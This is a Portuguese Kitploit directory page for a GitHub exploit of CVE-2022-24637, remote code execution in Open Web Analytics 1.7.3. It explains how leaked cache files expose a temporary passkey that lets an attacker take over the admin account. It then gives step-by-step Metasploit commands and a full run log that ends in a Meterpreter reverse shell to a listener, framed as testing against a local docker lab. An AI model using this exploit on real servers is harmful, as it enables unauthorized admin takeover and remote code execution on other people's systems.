Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2022-24637 — Open Web Analytics 1.7.3 - Execução Remota de Código | Kitploit
Ferramentas/GitHubGitHub/pflegusch/cve-2022-24637
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoFerramenta de Acesso Remoto
GitHubpflegusch/cve-2022-24637

CVE-2022-24637

Open Web Analytics 1.7.3 - Execução Remota de Código

Ver Repositório
44há 3 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Aplicação Vulnerável

O Open Web Analytics (OWA) antes da versão 1.7.4 permite que um atacante remoto não autenticado obtenha informações confidenciais de usuários, que podem ser usadas para obter privilégios de administrador ao explorar hashes de cache. Isso ocorre porque arquivos gerados com '<?php (em vez da sequência "<?php pretendida) não são tratados pelo interpretador PHP.

Etapas de Verificação

  1. Inicie uma instância vulnerável do OWA usando docker

    • Baixe https://github.com/Pflegusch/CVE-2022-24637/blob/main/deployment/docker-compose.yml
    • Inicie os contêineres: docker compose up -d
    • Abra http://127.0.0.1:80/
    • Siga as etapas de instalação usando as variáveis de ambiente do arquivo docker-compose.yml
      • URL pública: http://127.0.0.1/
      • Host do banco de dados (docker inspect <db-container> e obtenha o IPAddress, ex.: )
172.22.0.2
  • Porta do banco de dados: 3306
  • Nome do banco de dados: owa
  • Usuário do banco de dados: owa
  • Senha do banco de dados: Demo12+#
  • Continuar
  • Domínio do site: http://127.0.0.1
  • Nome do administrador: admin
  • E-mail: [email protected]
  • Senha: Demo12+#
  • Continuar
  • Inicie o msfconsole

  • use exploit/multi/http/open_web_analytics_rce

  • set RHOSTS 127.0.0.1

  • set RPORT 80

  • set SSL false

  • set LHOST 172.22.0.1 -> este precisa ser o IP da bridge criada com o comando docker compose up -d

  • check

  • run

  • Opções

    Senha

    Ao explorar o alvo, a senha do usuário atacado será substituída por esta senha.

    Nome de usuário

    O usuário que será alvo deste exploit.

    Opções Avançadas

    SearchLimit

    O exploit funciona recuperando um valor temp_passkey de um arquivo de cache que é criado para cada usuário ao tentar fazer login com ele. Como o diretório /owa-data/caches/ é publicamente acessível, podemos recuperar esses arquivos de cache. O caminho exato para os arquivos de cache depende do user_id e pode ser calculado com ele. Esta opção define quantos caminhos calculados, começando de 0, devem ser verificados em busca de arquivos de cache com o valor temp_passkey nele.

    Cenários

    Versão 1.7.3 usando a implantação docker descrita acima

    root@kitploit:~
    msf6 exploit(multi/http/open_web_analytics_rce) > set RHOSTS 127.0.0.1
    RHOSTS => 127.0.0.1
    msf6 exploit(multi/http/open_web_analytics_rce) > set LHOST 172.22.0.1
    LHOST => 172.22.0.1
    msf6 exploit(multi/http/open_web_analytics_rce) > run
    
    [*] Started reverse TCP handler on 172.22.0.1:4444 
    [*] Running automatic check ("set AutoCheck false" to disable)
    [+] The target appears to be vulnerable. Open Web Analytics 1.7.3 is vulnerable
    [+] Connected to http://127.0.0.1/ successfully!
    [*] Attempting to find cache of 'admin' user
    [+] Found temporary password for user 'admin': 85038e7e9f541ae4c4939d3044e628a5
    [+] Changed the password of 'admin' to 'pwned'
    [+] Logged in as admin user
    [*] Creating log file
    [+] Wrote payload to file
    [*] Sending stage (39927 bytes) to 172.22.0.3
    [+] Deleted QY0yivK4.php
    [*] Meterpreter session 1 opened (172.22.0.1:4444 -> 172.22.0.3:55434) at 2023-03-15 01:28:54 +0100
    [+] Triggering payload! Check your listener!
    
    meterpreter > pwd
    /var/www/html/owa-data/caches
    meterpreter > getuid
    Server username: www-data
    meterpreter >
    
    Baixar ferramenta